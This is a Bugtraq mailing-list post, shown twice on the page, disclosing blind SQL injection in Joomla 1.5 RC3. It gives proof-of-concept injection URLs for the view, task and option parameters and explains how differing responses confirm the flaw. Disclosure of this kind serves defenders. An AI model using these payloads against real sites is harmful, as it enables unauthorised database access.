Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Back to list
|
Post reply
Blind Sql-Injection in Joomla 1.5 RC3
Dec 05 2007 03:51AM
beenudel1986 gmail com
Thanks to team of Darkc0de.com
Blind Sql-Injection in Joomla 1.5 RC3
URL : http://localhost/index.php
1. Parameter = view
The following changes were applied to the original request:
? Set parameter 'view's value to 'somechars'%20+%20'article'
POC URL : http://localhost/index.php?option=com_content&view=somechars'%20+%20'art
icle&id=25&Itemid=28
This test uses several different HTTP requests in order to verify the existence of a Blind SQL
Injection vulnerability. The resulting test responses show that requests containing conditions with
the same logical values were identical to the original valid response, and the responses with
different values were not. This indicates that an SQL query is being executed at the back-end
database, and that the injected values affect the original query
2. Parameter = task
The following changes were applied to the original request:
? Set parameter 'task's value to 'somechars%27+%2B+%27search'
POC URL : http://localhost/index.php?searchword=&task=somechars%27+%2B+%27search&o
ption=com_search
3. Parameter = option
The following changes were applied to the original request:
? Set parameter 'option's value to 'somechars%27+%2B+%27com_search'
POC URL :http://localhost/index.php?searchword=&task=search&option=somechars%27+
%2B+%27com_search
~~~~~~~~~~mail : beenudel1986 (at) gmail (dot) com [email concealed]~~~~~~~~~~~~~~~~
greetz to : d3, baltazar , Zugzwang , icqbomber
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Blind Sql-Injection in Joomla 1.5 RC3
URL : http://localhost/index.php
1. Parameter = view
The following changes were applied to the original request:
? Set parameter 'view's value to 'somechars'%20+%20'article'
POC URL : http://localhost/index.php?option=com_content&view=somechars'%20+%20'art
icle&id=25&Itemid=28
This test uses several different HTTP requests in order to verify the existence of a Blind SQL
Injection vulnerability. The resulting test responses show that requests containing conditions with
the same logical values were identical to the original valid response, and the responses with
different values were not. This indicates that an SQL query is being executed at the back-end
database, and that the injected values affect the original query
2. Parameter = task
The following changes were applied to the original request:
? Set parameter 'task's value to 'somechars%27+%2B+%27search'
POC URL : http://localhost/index.php?searchword=&task=somechars%27+%2B+%27search&o
ption=com_search
3. Parameter = option
The following changes were applied to the original request:
? Set parameter 'option's value to 'somechars%27+%2B+%27com_search'
POC URL :http://localhost/index.php?searchword=&task=search&option=somechars%27+
%2B+%27com_search
~~~~~~~~~~mail : beenudel1986 (at) gmail (dot) com [email concealed]~~~~~~~~~~~~~~~~
greetz to : d3, baltazar , Zugzwang , icqbomber
[ reply ]